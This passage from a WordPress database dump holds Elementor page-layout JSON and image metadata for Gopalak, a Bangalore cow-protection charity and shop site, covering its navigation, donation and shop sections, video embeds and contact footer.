namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11463,1905,'_elementor_page_assets','a:0:{}'),(11466,1906,'_wp_attached_file','2022/10/cropped-GOPALAK-COIN-2.0.png'),(11467,1906,'_wp_attachment_context','site-icon'),(11468,1906,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:36:\"2022/10/cropped-GOPALAK-COIN-2.0.png\";s:8:\"filesize\";i:127283;s:5:\"sizes\";a:13:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"cropped-GOPALAK-COIN-2.0-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:53917;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"cropped-GOPALAK-COIN-2.0-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19198;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:36:\"cropped-GOPALAK-COIN-2.0-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59817;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:34:\"cropped-GOPALAK-COIN-2.0-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4372;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:36:\"cropped-GOPALAK-COIN-2.0-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11056;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:34:\"cropped-GOPALAK-COIN-2.0-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4102;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:34:\"cropped-GOPALAK-COIN-2.0-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4102;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:36:\"cropped-GOPALAK-COIN-2.0-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45789;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:36:\"cropped-GOPALAK-COIN-2.0-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27373;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:36:\"cropped-GOPALAK-COIN-2.0-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25100;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:34:\"cropped-GOPALAK-COIN-2.0-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2348;}s:22:\"elementor_custom_75x75\";a:4:{s:4:\"file\";s:88:\"elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png\";s:5:\"width\";i:75;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:22:\"elementor_custom_56x67\";a:4:{s:4:\"file\";s:88:\"elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjf5096xci8w2ik66d3rillme6nnvzuealxum.png\";s:5:\"width\";i:56;s:6:\"height\";i:67;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11482,1910,'_elementor_edit_mode','builder'),(11483,1910,'_elementor_template_type','wp-page'),(11484,1910,'_elementor_version','3.7.8'),(11485,1910,'_wp_page_template','elementor_canvas'),(11486,1910,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK-COIN-2.0.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11487,1910,'_elementor_page_assets','a:0:{}'),(11489,1911,'_elementor_edit_mode','builder'),(11490,1911,'_elementor_template_type','wp-page'),(11491,1911,'_elementor_version','3.7.8'),(11492,1911,'_wp_page_template','elementor_canvas'),(11493,1911,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK-COIN-2.0.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"